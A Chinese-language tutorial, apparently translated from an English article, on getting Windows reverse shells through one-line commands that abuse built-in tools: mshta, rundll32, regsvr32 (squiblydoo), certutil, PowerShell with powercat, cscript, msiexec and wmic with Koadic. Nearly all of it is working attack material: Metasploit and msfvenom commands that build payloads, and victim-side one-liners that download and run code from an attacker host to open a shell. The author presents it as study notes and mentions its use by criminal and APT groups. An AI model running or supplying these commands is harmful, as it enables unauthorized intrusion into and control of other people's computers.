前言

日常整理，当作笔记方便查阅。这一整篇文章的来源主要是看到了一位老外发的Get Reverse-shell via Windows one-liner文章而来，所幸就将他的作为上篇，待我整理后在把下篇发出来。

这种方法也被很多黑产和APT组织用来白加黑免杀，简直就是屡试不爽。最后本人也是菜鸡一只，就当作学习而写，如有不对的地方，望指出。

概述

=====

一般来说，我们经常利用HTTP服务或者其他服务RCE漏洞获得反向shell。而这篇文章主要讨论windows 单行命令执行Powershell或者rundll32恶意指令获得windows系统反向shell。我们准备了windows命令行列表，能使你获得目标计算机的反向shell。

内容列表

Mshta.exe

• 通过Metasploit的HTA Web服务器发起HTA攻击

Rundll32.exe

• 通过Metasploit的SMB交付发起Rundll32攻击

Regsvr32.exe

• 通过Metasploit的脚本Web交付启动Regsvr32

Certutil.exe

• 通过Msfvenom C＃shellcode启动MSbuild攻击

Powershell.exe

• 通过Powershell启动Powercat攻击

• 通过Powershell启动cscript.exe

• 通过Powershell启动批处理文件攻击

Msiexec.exe

• 通过msfvenom发起msiexec攻击

Wmic.exe

• 通过Koadic发起Wmic.exe攻击

Mshta.exe

Mshta.exe运行微软HTML应用程序主机，微软HTML应用程序主机是Windows应用用程序，负责运行HTA（HTML应用程序）文件。我们通运行HTML文件执行JavaScript和VBScript脚本。Mshta.exe可以解释这种文件。

Metasploit 包含生成恶意HTA文件的“HTA WebServer”模块，恶意文件通过Powershell运行有效负载。当用户导航到HTA文件时，将在执行有效负载之前由IE两次提示它们。

use exploit/windows/misc/hta\_server
msf exploit(windows/misc/hta\_server) >set srvhost 192.168.1.109
msf exploit(windows/misc/hta\_server) >set lhost 192.168.1.109
msf exploit(windows/misc/hta\_server) >exploit

现在可以在受害者机器上执行mshta.exe恶意代码获得meterpreter会话

在受害者机器上通过mshta.exe访问恶意hta远程文件，你就可以在本机获得shell。

mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta

获得受害主机shell:

Rundll.exe

Rundll32.exe与Windows操作系统相关联，Rundll32.exe可调用从DLL导出的函数（16位或32位）并将其存储在特定的内存库中。

通过SMB交付Metasploit发起Rundll32攻击

Metasploit包含“ SMB Delivery”模块，该模块生成恶意的dll文件。 该模块通过SMB服务器提供有效负载，并提供控制命令。 当前支持DLL和Powershell。

use exploit/windows/smb/smb\_delivery
msf exploit(windows/smb/smb\_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

下面通过Rundll32.exe命令获得meterpreter会话。

在受控机器上远程执行恶意dll,你将获得受控计算机的反向shell。

rundll32.exe \\\192.168.1.109\\vabFG\\test.dll,0

获得meterpreter会话如下：

Regsvr32.exe

Regsvr32.exe是一个命令行程序，用于注册和注销OLE控件，例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe安装在Windows XP和Windows更高版本的％systemroot％\ System32文件夹下。

RegSvr32.exe具有以下命令行选项：
语法：Regsvr32 \[/ s\] \[/ u\] \[/ n\] \[/ i \[：cmdline\]\]<dllname>            
 / u –注销服务器            
 / i –调用DllInstall，并为其传递可选的\[cmdline\]；     与/ u一起使用时，它将调用dll进行卸载            
/ n –不调用DllRegisterServer；此选项必须与
/ i一起使用
/ s –静音；不显示消息框

通过Metasploit的脚本Web交付启动Regsvr32

此模块可快速启动提供有效负载的Web服务器。提供的命令将允许有效负载下载并执行。它将通过regsvr32.exe来指定脚本语言解释器或“ squibledoo”来绕过应用程序白名单。该模块的主要目的是在目标计算机上快速建立会话。

Regsvr32使用squiblydoo技术绕过应用程序白名单。签名的Microsoft二进制文件Regsvr32能够运行.sct文件，然后在其中执行包含PowerShell命令。两个Web请求（即.sct文件和PowerShell下载/执行）都可以在同一端口上执行。“PSH（Binary）”会将文件写入到硬盘中，允许自定义二进制文件被下载和执行。

use exploit/multi/script/web\_delivery
msf exploit (web\_delivery)>set target 3
msf exploit (web\_delivery)> set payloadphp/meterpreter/reverse\_tcp
msf exploit (web\_delivery)> set lhost192.168.1.109
msf exploit (web\_delivery)>set srvhost192.168.1.109
msf exploit (web_delivery)>exploit

复制下图中突出被框选的代码：

一旦该exploit被执行，您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL，如下所示：

在命令执行后按Enter键，您将拥有您的会话。如下图所示，输入sysinfo命令获取主机信息：

Certutil.exe

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件，并获取meterpreter会话。

通过Msfvenom 发起certutil攻击

通过msfvenom 生成恶意可执行文件，并使用start multi/handler 获取目标计算机反向shell会话。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

再用python生成一个简易的http服务器

现在，为了使用certutil.exe能够获取配置信息和可执行文件,我们需要使用如下语法：

语法:[-f] [-urlcache] [-split]可执行文件路径

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

这样，我们获得了目标计算机的反向shell。如下所示：

Powershell.exe

您可以使用PowerShell.exe从另一个工具（例如Cmd.exe）的命令行启动PowerShell会话，也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。

通过Powershell启动Powercat攻击

PowerCat是一个的powershell写的TCP / IP瑞士军刀，看一看成NCAT的的powershell的实现，然后里面也加入了众多好用的功能，如文件上传，SMB协议支持，中继模式，生成有效载荷，端口扫描等等。

在本地计算机中下载 PowerShell，然后下载 Powercat.ps1，使用 python HTTP 服务器传输文件，以获取目标的反向外壳，如下所示，然后启动 netcat 侦听器。

git clone https://github.com/besimorhino/powercat.gitpython -m SimpleHTTPServer 80

然后在远程端执行下面的命令获得netcat会话。

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

正如你观察到的，我们已经获得了目标机器的netcat会话。

批处理文件攻击

同样，PowerShell 允许客户端执行批处理文件，因此让我们使用 msfvenom 生成恶意批处理文件，如下所示，然后启动 netcat 侦听器。

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

然后执行以下命令以获取 netcat 会话。

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))

如下，我们已经获得了目标机器的netcat会话。

利用cscript.exe

同样，PowerShell 允许客户端执行cscript.exe 运行 wsf、js 和vbscript文件。因此，让我们生成具有 msfvenom 的恶意bat文件，如下所示，并作为侦听器启动multi/handler程序。

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs >1.vbs

在目标机器上执行下面的命令行获得meterpreter会话。

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\\"$env:temp\\test.vbs\\");Start-Process %windir%\\system32\\cscript.exe \\"$env:temp\\test.vbs\\""

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

获得meterpreter会话如下：

Msiexec.exe

Windows 操作系统附带了一个 Windows 安装程序引擎，该引擎由 MSI 程序包用于应用程序的安装。解释包和安装产品的可执行程序就是 Msiexec.exe。

通过msfvenom发起msiexec攻击

让我们利用MeterpreterWindows攻击载荷生成 MSI 包文件（1.msi）如下所示，并作为侦听器启动multi/handler程序进行监听。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109lport=1234 -f msi > 1.msi

在msiexec 的帮助下，一旦您在远程计算机上执行 1.msi 文件，你会得到反向连接在您的本地计算机（Kali Linux）.

msiexec /q /i http://192.168.1.109/1.msi

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

获得meterpreter会话如下：

Wmic.exe

WMIC .exe是一个 Microsoft 工具，它提供了一个 WMI命令行界面，用于本地和远程计算机的各种管理功能，还用于在本地或远程执行系统设置、停止进程和执行脚本等查询。因此，它可以调用 XSL 脚本（可增强样式表语言）。

通过Koadic发起Wmic.exe攻击

koadic是一个命令控制（C2）工具，类似Metasploit和Powershell Empire。使用koadic我们生成恶意XSL文件。koadic安装完成后，您可以运行./koadic 文件以启动 koadic，然后通过运行以下命令开始加载stager/js/wmic 程序，并将 SRVHOST 设置为程序回连IP。

use stager/js/wmic
set SRVHOST 192.168.1.107
run

执行 WMIC 以下命令，从远程服务器下载和运行恶意 XSL 文件：

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

一旦恶意的XSL文件在目标计算机上执行，你将有一个僵尸连接，就像Metasploit回连的情况一样。